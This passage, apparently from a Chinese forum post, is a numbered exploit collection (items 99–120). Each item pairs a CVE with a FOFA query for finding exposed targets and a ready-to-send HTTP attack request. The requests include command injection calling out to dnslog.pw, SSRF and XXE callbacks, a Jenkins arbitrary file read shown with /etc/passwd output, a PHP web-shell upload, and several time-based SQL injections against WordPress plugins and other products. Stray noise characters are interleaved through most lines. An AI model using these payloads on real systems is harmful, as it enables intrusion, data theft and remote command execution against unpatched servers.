id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B7 ~) r# f' ?) A' J9 y3 O' m7 I
$ U8 ~. d5 g& M' J% l: ]( E
( @0 A7 Q0 \4 ]* S% a' ]! `- k" w8 O99. Ncast盈可视高清智能录播系统busiFacade RCE
' E/ K2 ?- M! T7 X) e" \% y9 JCVE-2024-0305
6 A8 }2 F2 E* Q- Z# k% w; R& ?: rFOFA:app="Ncast-产品" && title=="高清智能录播系统"
( B3 S9 Y0 X6 f3 |( ?POST /classes/common/busiFacade.php HTTP/1.1
# t3 B1 V1 u5 k; O4 Q: b* q5 k5 ^Host: 192.168.40.130:8080
. r3 U+ L. ]: [/ ^4 |5 d/ ^6 O/ HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 \2 o6 g" P; m7 aConnection: close' d6 c6 B% H) q! u/ T
Content-Length: 154
/ X+ V9 b1 c6 _3 IAccept: */* g9 y3 {6 e7 X
Accept-Encoding: gzip, deflate
. d A" S1 @4 Y9 r# c' x3 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ i% W( O5 x, r5 U. V8 z4 w3 F7 z
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
8 \! v. A3 n0 r2 s! j: K9 bX-Requested-With: XMLHttpRequest `6 S2 v/ ^& P7 ~
6 x* l" F) H& h$ C$ j( N! r# |4 a%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D9 a; f# p3 q% H
' U& c0 b( n# [1 ^/ ]( ^5 o7 O
1 V" B! Q7 c0 x) Y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传2 j" k( Z1 I9 \$ D5 z. d4 U
CVE-2024-0352
2 w3 q! r3 V8 D$ H5 hFOFA:icon_hash="874152924"* O* g/ _0 E6 d+ K. @9 y
POST /api/file/formimage HTTP/1.1
4 e$ q2 X9 `5 F+ x; O0 MHost: 192.168.40.130% r: R: X/ z5 t; Z3 {6 m4 ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.368 a8 A: U4 o# ~' X$ w7 k% q! [
Connection: close
' _) M5 d3 m% O$ _Content-Length: 2019 J6 X# X+ `' x/ r& E+ ]! l& p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
( ]' o/ T# y; l# S: kAccept-Encoding: gzip( T* h1 Y8 I# b: H/ A: L# }
/ Z; n; y' [/ V! w/ {------WebKitFormBoundarygcflwtei0 ^0 R8 O1 w& C) r
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
7 q1 [( a: X! n3 F9 D% j+ w- ]/ z$ UContent-Type: application/x-php
; S( ]/ G8 w; x& I$ U( y$ E' p
- E- ]( F, S" y! z* f2ayyhRXiAsKXL8olvF5s4qqyI2O
$ f2 k2 T/ Z/ ?! y/ a% o------WebKitFormBoundarygcflwtei--/ H4 |( T$ h6 @/ u! B0 B
+ p3 Q1 t1 b" o
4 b+ T) x- Q& B- ?4 W8 Z
101. ivanti policy secure-22.6命令注入! z1 [9 M9 s' Q( r
CVE-2024-21887
7 d4 I$ ~# {+ TFOFA:body="welcome.cgi?p=logo"6 F- R: S8 c a7 I
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.13 D3 L/ w: M- x/ y$ s6 b7 l5 `9 v
Host: x.x.x.xx.x.x.x- g0 u" W0 E& C2 O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' c0 f, G" l9 v# @8 \8 L
Connection: close4 ^9 e. y& {# W( R
Accept-Encoding: gzip
7 J+ K, [- x' @' i8 x, ?+ y0 {: U" Q: y# r
9 \# [" M+ g c4 D6 E2 ^; b/ ~- P102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 z0 m2 I" F% D3 F( mCVE-2024-21893
: e* h: y. ]$ q; X2 O4 ]( EFOFA:body="welcome.cgi?p=logo"* Y/ S& }. s" N# S( i0 ?5 Z
POST /dana-ws/saml20.ws HTTP/1.1
& I2 _% U) Y" THost: x.x.x.x( n( e6 f" E9 i: h' M6 }$ }" {3 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" i) [. K( q: U
Connection: close
+ ?1 K; u! d) d X, [4 ]Content-Length: 792
% \# a2 d4 ]- }/ E7 {8 f& [) {Accept-Encoding: gzip
% j( O' L4 H. e' i2 f$ M" L! l2 R
4 K: K6 c5 v2 P- `! p$ }& Q<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>& A. s0 @* Z. q# Q; }9 W9 i$ u
9 x/ ? \( _1 C+ z5 j3 G103. Ivanti Pulse Connect Secure VPN XXE- ]* P& m/ m8 J5 N% ^
CVE-2024-22024# b# l( C8 Q) k# T1 j x
FOFA:body="welcome.cgi?p=logo"$ S, i# u& A* H8 X$ ?, N5 M
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
6 q6 l& B4 S' q8 vHost: 192.168.40.130:1116 L, `0 o2 V: c0 M4 P3 X/ J
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.366 u" W( {/ L8 T1 ?4 i5 a
Connection: close
. R4 d; r6 K/ o: y% f* _: K: S+ bContent-Length: 204
3 F8 \% H& p) l, vContent-Type: application/x-www-form-urlencoded( Q b, _' [6 u, s# ?- \' K. X9 R
Accept-Encoding: gzip* k3 y- c. W- [, K _
1 j. ~7 j' P+ P1 b" p& O3 {! a/ q. rSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==& v$ n/ F. h# l( ?$ v; Z
6 \' J, t7 E2 z) a4 X& m4 r$ d5 _$ R* Z: F. e' h) k
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
2 w- d5 S- a( r8 b C<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r> k/ Z5 ?' `- V% H9 p
4 D) i- X% f {1 w) Z
: I$ S t$ b* C, q% v; ^104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露% C @8 f/ |/ Q H( D
CVE-2024-05699 W2 d7 M" \& o: x
FOFA:title="TOTOLINK"
& z4 U) t% A2 jPOST /cgi-bin/cstecgi.cgi HTTP/1.1
- f9 J) t) [9 mHost:192.168.0.1
0 L0 P/ t* X( |7 V0 sContent-Length:41
8 |) }! _- r9 hAccept:application/json,text/javascript,*/*;q=0.012 y- C; R5 ?. U( V; N+ A
X-Requested-with: XMLHttpRequest
' q. p; P9 k3 J" Q H3 V9 J: XUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
$ r+ S' M+ b9 j8 TContent-Type: application/x-www-form-urlencoded:charset=UTF-8! }$ o, l' m, _# b1 D) |6 C- g
Origin: http://192.168.0.1
+ c- L8 u4 e# }9 c V5 PReferer: http://192.168.0.1/advance/index.html?time=1671152380564
1 I. a. o m( d ]Accept-Encoding:gzip,deflate
6 w- r4 {8 c5 h% S6 b; nAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
* i; w* M( Y+ j% q qConnection:close
5 K, X4 }8 O1 C
) f& a; J- S6 z1 W{
7 a5 W2 {/ |5 v6 v# [3 @; J"topicurl":"getSysStatusCfg",
0 f% Y! k# F3 F3 ~ r" `3 i1 f* Q# W# F"token":""( P! P+ j6 ^8 F2 h$ w
}, F* V* z* h' `' o2 b
$ _; ~' R: G& C; A
105. SpringBlade v3.2.0 export-user SQL 注入
$ R2 n- b- J" D; l) TFOFA:body="https://bladex.vip"
; A) K" d L+ H/ {http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
# p$ u2 t3 p/ ^5 \4 ?5 w& V' l" c' q* F( X) l4 ~: x4 ^
106. SpringBlade dict-biz/list SQL 注入
4 U& T" C0 n- L4 T& H/ ^, A# U1 M9 CFOFA:body="Saber 将不能正常工作"
, w! V) M8 q9 Y! p$ D/ cGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
- I4 p4 Q& E1 q0 ~* v' FHost: your-ip S5 w9 _2 e4 k( g0 ^5 `' n) Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# N7 q- S- h" W0 _9 m( L$ b
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
2 }* d0 ^" ~! I6 p3 N& ZAccept-Encoding: gzip, deflate
& U7 Y# J/ B0 r+ BAccept-Language: zh-CN,zh;q=0.9
) h" s: v9 A: \3 I( mConnection: close
& \. i( Z% `1 X' v2 G8 z/ s0 t$ Y( |& V. _4 S& v
4 l$ j; L) g( k107. SpringBlade tenant/list SQL 注入
! x9 ^* f9 C+ DFOFA:body="https://bladex.vip"0 W& a4 J" M1 X* u5 Q3 a
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
& f* I2 U, m+ cHost: your-ip0 w! j7 ]5 {* ]4 a* O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! B) I7 h1 F* f! `Blade-Auth:替换为自己的
7 V2 N Y. @& O& r; V5 KConnection: close
) y, s$ [* r& R* C" H, `' U' f; c- _
; {5 p9 k, c. B! i. ~" @108. D-Tale 3.9.0 SSRF
6 g& K+ O6 l; G" w" A2 m( l' uCVE-2024-21642' f9 X1 F9 [, h/ \# i6 b
FOFA:"dtale/static/images/favicon.png"
+ N! a! _7 R0 eGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, r3 U T* `& F2 ?/ e+ o9 q
Host: your-ip$ m5 p" [' |/ m
Accept: application/json, text/plain, */*# J" \. d- m. D6 l/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: Z9 C) n0 ^: @# I% t4 r1 f, L
Accept-Encoding: gzip, deflate
* X3 O: G: X& b$ f# T) f( cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8" Y( Y+ c5 f$ S: z' L. b( h0 ?
Connection: close$ w# \9 k+ X7 }3 V- V/ \
3 i# W# q) p: K# @% k6 O, Y/ Y( ]. E) B( W6 f/ Y, u0 [
109. Jenkins CLI 任意文件读取4 `. V, O+ h2 V
CVE-2024-238979 v2 Y7 b6 |1 y
FOFA:header="X-Jenkins"
7 P8 z8 X! _6 B- s) G gPOST /cli?remoting=false HTTP/1.10 V; Q! O h; o. _) M5 W: J
Host:1 s/ P' P& }7 g- \7 H* h& }8 z p
Content-type: application/octet-stream
/ s2 w9 M6 {+ b! x" a$ f" USession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 W$ t) l+ e7 a- a
Side: upload9 r8 z8 |/ ? O) f: k) }
Connection: keep-alive( {+ S+ s2 |" P! n: O
Content-Length: 163
. j6 Q7 E- z& L" @# b8 {. \1 @' `$ C/ J$ B9 N4 Z9 m0 l, L
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'! Q1 M0 I2 S$ m6 a; @7 `
* \0 p, V( K7 H8 L7 l
0 M0 a+ A m, CPOST /cli?remoting=false HTTP/1.17 d6 ^) {3 g" b8 \3 q y/ H
Host:
5 _9 H/ }" T# \2 X' t5 A) I+ M6 vSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& |) `; a# T. w
download
3 p( J( Y$ a" t) y0 c$ eContent-Type: application/x-www-form-urlencoded U4 o( `( V6 _9 s. `1 V
Content-Length: 0
$ h# J( }& S/ [, X/ m, W' `+ w, C" e% K. I
% L# L) g/ Z; I' R9 Q2 F& gERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin; f' H1 W1 G( B
java -jar jenkins-cli.jar help
$ G' [2 J R3 [2 r# |% E. F* `5 a[COMMAND]3 z; n3 m% X1 V! `) B0 K
Lists all the available commands or a detailed description of single command.
2 f9 [7 i8 b. f2 H7 y1 Y$ s3 `8 X# U COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
3 Y* U! U5 H8 V
. W) P ~" c$ z# V
3 w& X' s9 w+ L9 N* \110. Goanywhere MFT 未授权创建管理员
# z% C; ?, s; oCVE-2024-0204" B( _5 ~6 N7 ] \) |) ~. l/ _
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"7 j, _) ~( E- E% L* E* g
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
% D( S- K$ F; I% e. W6 tHost: 192.168.40.130:8000$ p% \5 X. F/ c, k b
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36/ a# F8 j6 K& f' b' g! N
Connection: close- R! ]- V, _! q m. g4 S
Accept: */*- u1 d$ p; k* c3 h
Accept-Language: en f a/ C% T% n, L* w' O
Accept-Encoding: gzip# a5 ~9 t. @9 T% t
' b& n8 C1 p8 x: n9 I" J6 J' x& {3 m4 Q& b2 I0 {
111. WordPress Plugin HTML5 Video Player SQL注入7 s/ y9 b8 i( U2 O$ Z# A2 W4 ~
CVE-2024-1061
% [' I6 W5 O* H. u+ @$ p7 I& [FOFA:"wordpress" && body="html5-video-player"( Y' @, U& O/ r5 L; Q# A
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
7 {; j6 r s& |Host: 192.168.40.130:112
Z7 P. p) B# h8 g0 e `2 L! z! X. uUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ a) a. U4 ? t3 O. lConnection: close0 y4 O6 L8 `+ |; b
Accept: */*0 X: ~" i# {( x, A
Accept-Language: en
1 O+ s5 ^8 @0 u( v$ D, I! |# QAccept-Encoding: gzip
( d# W9 r& N0 A
E" J) {6 w% U: |
$ ^& M1 s& ?. b) u; t- d/ L112. WordPress Plugin NotificationX SQL 注入0 ^6 j' r" F7 e3 u* L1 u
CVE-2024-1698
6 R2 z* ^: V* l( wFOFA:body="/wp-content/plugins/notificationx"
. [$ M* I/ S3 Z7 ^$ z7 ?POST /wp-json/notificationx/v1/analytics HTTP/1.1( {7 i9 P6 `# p, H
Host: {{Hostname}}* ]) w1 |) K9 R' a& p. \
Content-Type: application/json
' s' v) T4 s& S+ @3 j: ^1 e+ q0 x& `( ^
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
5 e/ G8 q. Q1 j$ M8 m+ L( j) R! _/ z( Y/ V. O6 k) T
) \( j7 p2 v) h113. WordPress Automatic 插件任意文件下载和SSRF0 P+ S1 S4 y: M1 `, p
CVE-2024-27954
. h/ r% }& J6 y: @# D: [4 DFOFA:"/wp-content/plugins/wp-automatic": A2 G! ~; n; {+ q/ `
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
' }% \9 R! c7 oHost: x.x.x.x
: S9 u7 g4 ]" y8 NUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36- E& z. O: y2 m/ Q8 h! n
Connection: close4 Y" @4 M1 w- h2 }/ Y
Accept: */*' K/ c# W: o! v7 o1 n' `9 c
Accept-Language: en% ]+ a- [% H+ ?' M
Accept-Encoding: gzip
% x2 n+ H# L. h
9 `$ E$ E& t' w: N. S H _$ z, X5 p# w; B
114. WordPress MasterStudy LMS插件 SQL注入/ O( |1 [* ]6 g( H
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
1 j; r- V+ T- T- J' @+ _GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.13 |$ Z) U Z$ }# ^4 j5 f
Host: your-ip
! X, Q/ s$ Q+ d0 D3 F. p9 F/ FUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.369 J1 Z5 K* Z6 @/ t' s
Accept-Charset: utf-8
8 k0 G, B* \: eAccept-Encoding: gzip, deflate
/ x! B, t1 x3 j pConnection: close+ Z$ p/ F+ x7 X8 W1 @
- B6 d0 U/ p O. ` O
0 h3 O8 F3 E" S# v% A6 \
115. WordPress Bricks Builder <= 1.9.6 RCE' _+ P) H" F/ `- | G
CVE-2024-25600
+ @: b( H* @, f/ c. i I# bFOFA: body="/wp-content/themes/bricks/"# \7 {! [+ n$ v2 c$ Z
第一步,获取网站的nonce值
P$ F; I3 D6 m3 H- B+ ?, CGET / HTTP/1.1 b# ?8 I, k8 a; Q% Z3 }7 n
Host: x.x.x.x
6 h% w: }, T: D; n7 |( FUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Q; H/ x' z; [. Q7 Q0 [' {1 t3 ~
Connection: close
, Q# p7 ]) r" k; PAccept-Encoding: gzip
0 {2 P4 l) e* `" o& J6 \, t" ~+ {7 x" q9 w
/ Y0 e# h& {( e- I
第二步替换nonce值,执行命令
3 G/ x' p+ {' R1 D1 x |2 D9 SPOST /wp-json/bricks/v1/render_element HTTP/1.16 r+ t0 ~* a+ p
Host: x.x.x.x
( w4 A" Q c- ?; s6 w6 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" J0 ~2 D9 S* b @* k$ H5 Y
Connection: close
& b% ]+ z* b* y. LContent-Length: 356
a. ]) w( l/ F7 F: LContent-Type: application/json
; r8 c5 }& ^4 F/ h# y, @Accept-Encoding: gzip
6 u7 _9 K5 k# C: C/ }
5 I0 \3 T" n. k1 e% F. N{
8 a; r: c0 Y: I' D0 D"postId": "1",' p9 }; p1 H8 X( Y; U
"nonce": "第一步获得的值",9 v3 M: _+ _- U' h- u! G7 ?
"element": {
8 z8 f0 a, S1 [4 r0 a& P* d "name": "container",
6 U! L: H% Q1 F( [ "settings": {
9 Z- W+ R2 ~9 r) m0 D! R& _ "hasLoop": "true",
8 i {& C2 t) s6 t c l "query": {( l9 q4 Y! l. C4 p6 t% Z, {( w8 x. O
"useQueryEditor": true,, ]: C" X0 w! C
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
) M& W- F \( @ ~9 q* P; C "objectType": "post"
' N" q: c3 a4 t* j# M. k }. @6 X" `- m* V/ }- l6 C
}
/ S9 A1 T. o; u$ V) v4 V2 z }
* O% }" I( |& m$ }- j9 K* D}
$ w& p( k" T8 ]3 e- O- U" D4 Q4 ~
* R! a4 c- D6 A; m& S+ A116. wordpress js-support-ticket文件上传
; o5 x% \; A" V' G# Z% jFOFA:body="wp-content/plugins/js-support-ticket"
6 {, ?( d: e: ]# c6 r, j/ \7 j4 UPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1, p2 C& ]8 P! I% w6 O1 V
Host:4 h! j2 C$ B( p3 Q
Content-Type: multipart/form-data; boundary=--------767099171
) X4 |, k: K; u* [# LUser-Agent: Mozilla/5.0
9 Q7 k% V% y9 F3 ~4 Q" c6 b- ]- i" o& S0 F
----------767099171
9 e; A- H! t9 @4 HContent-Disposition: form-data; name="action"% n, H# K& Y1 e
configuration_saveconfiguration
# E3 E8 y7 z. U) M7 ?' q----------767099171/ o" P# q$ s; {: f* h
Content-Disposition: form-data; name="form_request"
/ N+ m& j; W+ I$ n% g/ ^" {jssupportticket* W! b) ~6 {9 j
----------767099171
0 v. @* J) M/ uContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
7 A$ N R( b: C! O3 ^; ^* D* `Content-Type: image/png( x: ]2 n; |4 R. o! Y
----------767099171--: w8 h' {2 L i3 R2 }- ]
. s$ S U( v, N6 a7 {
; T1 ~! N; v; m2 C G ?117. WordPress LayerSlider插件SQL注入+ c( ]- [; {" K! b- K) O$ d9 O
version:7.9.11 – 7.10.0% r# \& i' B/ G
FOFA:body="/wp-content/plugins/LayerSlider/"
2 `' q$ d, v9 z: e6 v5 f; o* hGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1- f8 Z+ R% N* V5 O3 G; N/ Q
Host: your-ip) g$ q z6 Q8 P/ h, ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 d1 D: D7 _' W- hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) [) Q" G. e5 I, D/ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ?8 y2 J5 x+ |1 _5 _Accept-Encoding: gzip, deflate, br
; z; n: b" S$ z" p5 G f( n- f" eConnection: close
; z" l/ J2 ?- w3 t- jUpgrade-Insecure-Requests: 1
# K9 x( y) s$ c0 a" A n9 }- M4 @% q& C+ Q5 r
! U; o4 S* f# ^) Z, d3 R! S
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传! {6 a3 I5 p9 @/ f
CVE-2024-0939
1 ^5 W1 \& z- O" E* y' \ U/ NFOFA:title="Smart管理平台"
) z" k6 Y4 l( K. } S* M5 V" j: QPOST /Tool/uploadfile.php? HTTP/1.15 \5 g& W$ [( ]$ M; T7 o
Host: 192.168.40.130:8443
, ^' i( V2 t% dCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
# `1 \, u- _" X0 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 o5 V7 q5 r& Q; ?% X2 E2 ?2 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 F! j' M j! `6 a$ D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: L! L' N7 Y/ A" m
Accept-Encoding: gzip, deflate
- t- E7 h4 d% l! y: a8 PContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887% C# ?4 y l4 M6 W
Content-Length: 405
& y9 w, f9 t0 f: ?& T8 _Origin: https://192.168.40.130:8443
7 h9 B5 P* }: Z3 T; gReferer: https://192.168.40.130:8443/Tool/uploadfile.php
; j0 h4 _1 u1 y" V! t3 BUpgrade-Insecure-Requests: 1
, N) ?* [* F+ H/ Z2 h* hSec-Fetch-Dest: document
+ z3 S+ B0 u, w/ e6 @* c* VSec-Fetch-Mode: navigate: g; q, c; |/ a M7 i7 E* ?; u: l% e, K
Sec-Fetch-Site: same-origin
) ~- }4 {9 x i8 i1 g6 ~, XSec-Fetch-User: ?1
( s J- d2 _* T% ~- BTe: trailers
8 K* y0 Z4 H9 ?Connection: close
6 B" p, l3 k# D! u7 r: E# H. @; J: m9 T, r
-----------------------------13979701222747646634037182887
7 ^7 Z5 G# D0 l6 lContent-Disposition: form-data; name="file_upload"; filename="contents.php"; h' b1 l& i5 c1 n- x# l
Content-Type: application/octet-stream
6 i# C; E' B# s: p( k
) w' R# L1 N. W, X/ e<?php
* O2 z; ?. @# R. Gsystem($_POST["passwd"]);
5 Z6 S0 m% g! d4 N?>
O/ q9 k. T) }0 o4 W) Z-----------------------------13979701222747646634037182887; W' k4 K- g" Z0 o2 |4 g j5 @
Content-Disposition: form-data; name="txt_path"" f x& M! | D m- \
3 {: Q N. n4 Y. y' r/home/src.php
! x/ w( p2 ?5 Y2 O( [- v0 u) q-----------------------------13979701222747646634037182887--; g" H2 N* y) i6 F. u9 P
6 a& x: p( W4 k5 R. |
! U! G- p; N3 P) o0 N访问/home/src.php
4 a: B$ u V& E0 N8 a
; b: g7 ~5 H8 ^* e7 r119. 北京百绰智能S20后台sysmanageajax.php sql注入
7 c2 o' f- |1 c5 |CVE-2024-1254
) s9 c5 C" L3 H- g& CFOFA:title="Smart管理平台"* i% G( t' H; }; u& {
先登录进入系统,默认账号密码为admin/admin
+ [& z* z2 |# ^9 J7 |3 X# @- {POST /sysmanage/sysmanageajax.php HTTP/1.11
4 ?7 n4 q7 t% W. A+ B. hHost: x.x.x.x* A( ]) f/ X }, e8 E* z
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
$ E9 Z r8 e) ~: j8 j* v# {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 M+ D- E/ ^5 X3 c. f; B7 b! pAccept: */*+ V6 @9 c7 @9 B: M9 W5 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: {4 T: @, b5 a) i9 v
Accept-Encoding: gzip, deflate8 t# B! j" l9 [( y. y
Content-Type: application/x-www-form-urlencoded;) k. }) A9 `; h/ O" E
Content-Length: 109) v0 F$ D: f& h$ j
Origin: https://58.18.133.60:8443
. o1 k& [* Y; A/ ^6 Y1 eReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
* ~3 u; T& H$ p' CSec-Fetch-Dest: empty! Y$ A' s( P" ]
Sec-Fetch-Mode: cors
1 M3 x( c3 @4 @Sec-Fetch-Site: same-origin: k3 G' a5 w, ~7 N+ B0 f$ Z/ E
X-Forwarded-For: 1.1.1.1; E: G5 a( T _# R; L/ X/ y9 e: r' a
X-Originating-Ip: 1.1.1.1
0 b% I V. Y* q% Z" {, UX-Remote-Ip: 1.1.1.1
4 n2 i- C+ d4 p. N! m/ GX-Remote-Addr: 1.1.1.1
# P0 R- f6 t9 q6 N4 UTe: trailers
* y6 b4 ^6 j" K- Q$ O* E9 u$ \Connection: close4 O H. y, L/ E3 i
. H9 h# x* u. j
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
6 J" ? w7 {* O" u: `2 t% L" F# V( B
8 u( R5 ]; g0 V: q: c120. 北京百绰智能S40管理平台导入web.php任意文件上传+ S) ~, Y- p N
CVE-2024-1253
+ J j+ Y4 j1 Y) g) U1 } LFOFA:title="Smart管理平台"+ R* Y ? Q- g; w- t/ }0 ]
